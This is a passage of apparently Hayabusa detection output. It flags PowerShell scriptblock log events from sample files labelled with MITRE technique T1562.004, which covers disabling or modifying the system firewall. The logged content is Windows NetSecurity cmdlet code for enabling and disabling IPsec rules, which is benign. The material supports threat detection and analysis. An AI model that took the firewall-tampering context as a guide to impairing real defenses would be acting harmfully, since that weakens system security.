($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock 
Log,"Filter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) 
$__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } 
if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,") -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and 
(@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName 
)) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' -Alias '*' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, 
ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] 